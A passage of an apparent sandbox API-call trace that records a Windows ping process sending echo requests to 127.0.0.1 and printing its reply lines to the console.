lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0128.115] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x467b00 [0128.115] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x467b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0128.115] _fileno (_File=0x76ea4c28) returned 1 [0128.115] _write (in: _FileHandle=1, _Buf=0x467b00*, _MaxCharCount=0x14 | out: _Buf=0x467b00*) returned 20 [0128.115] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0128.116] _fileno (_File=0x76ea4c28) returned 1 [0128.116] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0128.116] LocalFree (hMem=0x467b00) returned 0x0 [0128.116] LocalFree (hMem=0x467ac8) returned 0x0 [0128.116] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x15ef50, nSize=0x0, Arguments=0x15ef4c | out: lpBuffer="竈F襤\x15▪\x94䰨盪❚") returned 0x18 [0128.116] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0128.116] _fileno (_File=0x76ea4c28) returned 1 [0128.116] _get_osfhandle (_FileHandle=1) returned 0x28 [0128.116] GetFileType (hFile=0x28) returned 0x2 [0128.116] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef14 | out: lpMode=0x15ef14) returned 0 [0128.116] GetLastError () returned 0x6 [0128.116] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee78, nSize=0x50 | out: lpBuffer="\x15❚") returned 0x0 [0128.116] _fileno (_File=0x76ea4c28) returned 1 [0128.116] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0128.116] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0128.116] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x45c4a8 [0128.116] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x45c4a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0128.116] _fileno (_File=0x76ea4c28) returned 1 [0128.116] _write (in: _FileHandle=1, _Buf=0x45c4a8*, _MaxCharCount=0x18 | out: _Buf=0x45c4a8*) returned 24 [0128.116] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0128.116] _fileno (_File=0x76ea4c28) returned 1 [0128.116] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0128.116] LocalFree (hMem=0x45c4a8) returned 0x0 [0128.116] LocalFree (hMem=0x467ac8) returned 0x0 [0128.116] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0128.116] IcmpSendEcho2Ex (in: IcmpHandle=0x456a68, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x45c2c8, RequestSize=0x20, RequestOptions=0x15efcc, ReplyBuffer=0x465270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x465270) returned 0x1 [0128.117] InetNtopW (in: Family=2, pAddr=0x15efbc, pStringBuf=0x15f0e4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0128.117] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x15ef50, nSize=0x0, Arguments=0x15ef4c | out: lpBuffer="笰F襤\x15⛔\x94䰨盪✣") returned 0x16 [0128.117] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0128.117] _fileno (_File=0x76ea4c28) returned 1 [0128.117] _get_osfhandle (_FileHandle=1) returned 0x28 [0128.117] GetFileType (hFile=0x28) returned 0x2 [0128.117] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef14 | out: lpMode=0x15ef14) returned 0 [0128.117] GetLastError () returned 0x6 [0128.117] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee78, nSize=0x50 | out: lpBuffer="\x15✣") returned 0x0 [0128.117] _fileno (_File=0x76ea4c28) returned 1 [0128.117] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0128.117] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0128.117] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x467b68 [0128.117] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x467b68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0128.117] _fileno (_File=0x76ea4c28) returned 1 [0128.117] _write (in: _FileHandle=1, _Buf=0x467b68*, _MaxCharCount=0x16 | out: _Buf=0x467b68*) returned 22 [0128.117] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0128.117] _fileno (_File=0x76ea4c28) returned 1 [0128.117] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0128.117] LocalFree (hMem=0x467b68) returned 0x0 [0128.117] LocalFree (hMem=0x467b30) returned 0x0 [0128.117] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x15ef50, nSize=0x0, Arguments=0x15ef4c | out: lpBuffer="笰F襤\x15⛿\x94䰨盪✼") returned 0x9 [0128.117] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0128.117] _fileno (_File=0x76ea4c28) returned 1 [0128.117] _get_osfhandle (_FileHandle=1) returned 0x28 [0128.117] GetFileType (hFile=0x28) returned 0x2 [0128.117] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef14 | out: lpMode=0x15ef14) returned 0 [0128.118] GetLastError () returned 0x6 [0128.118] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee78, nSize=0x50 | out: lpBuffer="\x15✼") returned 0x0 [0128.118] _fileno (_File=0x76ea4c28) returned 1 [0128.118] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0128.118] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.118] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x458970 [0128.118] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x458970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0128.118] _fileno (_File=0x76ea4c28) returned 1 [0128.118] _write (in: _FileHandle=1, _Buf=0x458970*, _MaxCharCount=0x9 | out: _Buf=0x458970*) returned 9 [0128.118] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0128.118] _fileno (_File=0x76ea4c28) returned 1 [0128.118] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0128.118] LocalFree (hMem=0x458970) returned 0x0 [0128.118] LocalFree (hMem=0x467b30) returned 0x0 [0128.118] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x15ef54, nSize=0x0, Arguments=0x15ef50 | out: lpBuffer="笰F襤\x15➷\x94䰨盪✧") returned 0x9 [0128.118] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0128.118] _fileno (_File=0x76ea4c28) returned 1 [0128.118] _get_osfhandle (_FileHandle=1) returned 0x28 [0128.118] GetFileType (hFile=0x28) returned 0x2 [0128.118] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef18 | out: lpMode=0x15ef18) returned 0 [0128.118] GetLastError () returned 0x6 [0128.118] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee7c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0128.118] _fileno (_File=0x76ea4c28) returned 1 [0128.118] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0128.118] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.118] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x458970 [0128.118] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x458970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0128.118] _fileno (_File=0x76ea4c28) returned 1 [0128.118] _write (in: _FileHandle=1, _Buf=0x458970*, _MaxCharCount=0x9 | out: _Buf=0x458970*) returned 9 [0128.118] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0128.118] _fileno (_File=0x76ea4c28) returned 1 [0128.118] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0128.118] LocalFree (hMem=0x458970) returned 0x0 [0128.118] LocalFree (hMem=0x467b30) returned 0x0 [0128.118] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x15ef50, nSize=0x0, Arguments=0x15ef4c | out: lpBuffer="笰F襤\x15⟘\x94䰨盪✨") returned 0x9 [0128.118] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0128.118] _fileno (_File=0x76ea4c28) returned 1 [0128.118] _get_osfhandle (_FileHandle=1) returned 0x28 [0128.118] GetFileType (hFile=0x28) returned 0x2 [0128.118] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef14 | out: lpMode=0x15ef14) returned 0 [0128.118] GetLastError () returned 0x6 [0128.118] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee78, nSize=0x50 | out: lpBuffer="\x15✨") returned 0x0 [0128.118] _fileno (_File=0x76ea4c28) returned 1 [0128.118] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0128.118] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.118] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x458970 [0128.118] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x458970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0128.118] _fileno (_File=0x76ea4c28) returned 1 [0128.118] _write (in: _FileHandle=1, _Buf=0x458970*, _MaxCharCount=0x9 | out: _Buf=0x458970*) returned 9 [0128.118] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0128.119] _fileno (_File=0x76ea4c28) returned 1 [0128.119] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0128.119] LocalFree (hMem=0x458970) returned 0x0 [0128.119] LocalFree (hMem=0x467b30) returned 0x0 [0128.119] Sleep (dwMilliseconds=0x3e8) [0129.131] IcmpSendEcho2Ex (in: IcmpHandle=0x456a68, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x45c2c8, RequestSize=0x20, RequestOptions=0x15efcc, ReplyBuffer=0x465270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x465270) returned 0x1 [0129.131] InetNtopW (in: Family=2, pAddr=0x15efbc, pStringBuf=0x15f0e4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0129.132] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x15ef50, nSize=0x0, Arguments=0x15ef4c | out: lpBuffer="羠F襤\x15⛔\x94䰨盪✣") returned 0x16 [0129.132] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0129.132] _fileno (_File=0x76ea4c28) returned 1 [0129.132] _get_osfhandle (_FileHandle=1) returned 0x28 [0129.132] GetFileType (hFile=0x28) returned 0x2 [0129.132] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef14 | out: lpMode=0x15ef14) returned 0 [0129.132] GetLastError () returned 0x6 [0129.132] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee78, nSize=0x50 | out: lpBuffer="\x15✣") returned 0x0 [0129.132] _fileno (_File=0x76ea4c28) returned 1 [0129.132] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0129.132] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0129.132] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x467fd8 [0129.132] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x467fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0129.132] _fileno (_File=0x76ea4c28) returned 1 [0129.132] _write (in: _FileHandle=1, _Buf=0x467fd8*, _MaxCharCount=0x16 | out: _Buf=0x467fd8*) returned 22 [0129.132] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0129.132] _fileno (_File=0x76ea4c28) returned 1 [0129.132] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0129.132] LocalFree (hMem=0x467fd8) returned 0x0 [0129.132] LocalFree (hMem=0x467fa0) returned 0x0 [0129.132] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x15ef50, nSize=0x0, Arguments=0x15ef4c | out: lpBuffer="羠F襤\x15⛿\x94䰨盪✼") returned 0x9 [0129.132] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0129.132] _fileno (_File=0x76ea4c28) returned 1 [0129.132] _get_osfhandle (_FileHandle=1) returned 0x28 [0129.132] GetFileType (hFile=0x28) returned 0x2 [0129.132] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef14 | out: lpMode=0x15ef14) returned 0 [0129.132] GetLastError () returned 0x6 [0129.132] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee78, nSize=0x50 | out: lpBuffer="\x15✼") returned 0x0 [0129.132] _fileno (_File=0x76ea4c28) returned 1 [0129.132] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0129.132] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.132] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4589b8 [0129.132] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x4589b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0129.132] _fileno (_File=0x76ea4c28) returned 1 [0129.132] _write (in: _FileHandle=1, _Buf=0x4589b8*, _MaxCharCount=0x9 | out: _Buf=0x4589b8*) returned 9 [0129.133] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0129.133] _fileno (_File=0x76ea4c28) returned 1 [0129.133] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0129.133] LocalFree (hMem=0x4589b8) returned 0x0 [0129.133] LocalFree (hMem=0x467fa0) returned 0x0 [0129.133] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x15ef54, nSize=0x0, Arguments=0x15ef50 | out: lpBuffer="羠F襤\x15➷\x94䰨盪✧") returned 0x9 [0129.133] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0129.133] _fileno (_File=0x76ea4c28) returned 1 [0129.133] _get_osfhandle (_FileHandle=1) returned 0x28 [0129.133] GetFileType (hFile=0x28) returned 0x2 [0129.133] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef18 | out: lpMode=0x15ef18) returned 0 [0129.133] GetLastError () returned 0x6 [0129.133] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee7c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0129.133] _fileno (_File=0x76ea4c28) returned 1 [0129.133] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0129.133] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.133] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x458970 [0129.133] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x458970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0129.133] _fileno (_File=0x76ea4c28) returned 1 [0129.133] _write (in: _FileHandle=1, _Buf=0x458970*, _MaxCharCount=0x9 | out: _Buf=0x458970*) returned 9 [0129.133] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0129.133] _fileno (_File=0x76ea4c28) returned 1 [0129.133] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0129.133] LocalFree (hMem=0x458970) returned 0x0 [0129.133] LocalFree (hMem=0x467fa0) returned 0x0 [0129.133] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x15ef50, nSize=0x0, Arguments=0x15ef4c | out: lpBuffer="羠F襤\x15⟘\x94䰨盪✨") returned 0x9 [0129.133] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0129.133] _fileno (_File=0x76ea4c28) returned 1 [0129.133] _get_osfhandle (_FileHandle=1) returned 0x28 [0129.133] GetFileType (hFile=0x28) returned 0x2 [0129.133] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef14 | out: lpMode=0x15ef14) returned 0 [0129.133] GetLastError () returned 0x6 [0129.133] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee78, nSize=0x50 | out: lpBuffer="\x15✨") returned 0x0 [0129.133] _fileno (_File=0x76ea4c28) returned 1 [0129.133] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0129.133] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.133] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x458970 [0129.133] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x458970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0129.133] _fileno (_File=0x76ea4c28) returned 1 [0129.133] _write (in: _FileHandle=1, _Buf=0x458970*, _MaxCharCount=0x9 | out: _Buf=0x458970*) returned 9 [0129.133] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0129.133] _fileno (_File=0x76ea4c28) returned 1 [0129.133] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0129.133] LocalFree (hMem=0x458970) returned 0x0 [0129.133] LocalFree (hMem=0x467fa0) returned 0x0 [0129.133] Sleep (dwMilliseconds=0x3e8) [0130.153] IcmpSendEcho2Ex (in: IcmpHandle=0x456a68, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x45c2c8, RequestSize=0x20, RequestOptions=0x15efcc, ReplyBuffer=0x465270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x465270) returned 0x1 [0130.154] InetNtopW (in: Family=2, pAddr=0x15efbc, pStringBuf=0x15f0e4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0130.154] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x15ef50, nSize=0x0, Arguments=0x15ef4c | out: lpBuffer="羠F襤\x15⛔\x94䰨盪✣") returned 0x16 [0130.154] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.154] _fileno (_File=0x76ea4c28) returned 1 [0130.154] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.154] GetFileType (hFile=0x28) returned 0x2 [0130.154] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef14 | out: lpMode=0x15ef14) returned 0 [0130.154] GetLastError () returned 0x6 [0130.154] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee78, nSize=0x50 | out: lpBuffer="\x15✣") returned 0x0 [0130.154] _fileno (_File=0x76ea4c28) returned 1 [0130.154] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0130.154] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0130.154] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x467fd8 [0130.154] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x467fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0130.154] _fileno (_File=0x76ea4c28) returned 1 [0130.154] _write (in: _FileHandle=1, _Buf=0x467fd8*, _MaxCharCount=0x16 | out: _Buf=0x467fd8*) returned 22 [0130.154] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.154] _fileno (_File=0x76ea4c28) returned 1 [0130.154] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0130.154] LocalFree (hMem=0x467fd8) returned 0x0 [0130.154] LocalFree (hMem=0x467fa0) returned 0x0 [0130.154] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x15ef50, nSize=0x0, Arguments=0x15ef4c | out: lpBuffer="羠F襤\x15⛿\x94䰨盪✼") returned 0x9 [0130.154] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.154] _fileno (_File=0x76ea4c28) returned 1 [0130.154] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.154] GetFileType (hFile=0x28) returned 0x2 [0130.154] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef14 | out: lpMode=0x15ef14) returned 0 [0130.154] GetLastError () returned 0x6 [0130.154] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee78, nSize=0x50 | out: lpBuffer="\x15✼") returned 0x0 [0130.154] _fileno (_File=0x76ea4c28) returned 1 [0130.154] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0130.154] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.154] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x458970 [0130.154] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x458970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0130.154] _fileno (_File=0x76ea4c28) returned 1 [0130.154] _write (in: _FileHandle=1, _Buf=0x458970*, _MaxCharCount=0x9 | out: _Buf=0x458970*) returned 9 [0130.154] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.154] _fileno (_File=0x76ea4c28) returned 1 [0130.154] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0130.154] LocalFree (hMem=0x458970) returned 0x0 [0130.154] LocalFree (hMem=0x467fa0) returned 0x0 [0130.154] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x15ef54, nSize=0x0, Arguments=0x15ef50 | out: lpBuffer="羠F襤\x15➷\x94䰨盪✧") returned 0x9 [0130.154] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.154] _fileno (_File=0x76ea4c28) returned 1 [0130.154] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.154] GetFileType (hFile=0x28) returned 0x2 [0130.155] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x15ef18 | out: lpMode=0x15ef18) returned 0 [0130.155] GetLastError () returned 0x6 [0130.155] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x15ee7c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0130.155] _fileno (_File=0x76ea4c28) returned 1 [0130.155] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0130.155] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.155] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x458970 [0130.155] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x458970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0130.155] _fileno (_File=0x76ea4c28) returned 1 [0130.155] _write (in: _FileHandle=1, _Buf=0x458970*, _MaxCharCount=0x9 | out: _Buf=0x458970*) returned 9 [0130.155] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.155] _fileno (_File=0x76ea4c28) returned 1 [0130.155] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0130.155] LocalFree (hMem=0x458970) returned 0x0 [0130.155] LocalFree (hMem=0x467fa0) returned 0x0 [0130.155] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x15ef50, nSize=0x0, Arguments=0x15ef4c | out: lpBuffer="羠F襤\x15⟘\x94䰨盪✨") returned 0x9 [0130.155] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0130.155] _fileno (_File=0x76ea4c28) returned 1 [0130.155] _get_osfhandle (_FileHandle=1) returned 0x28 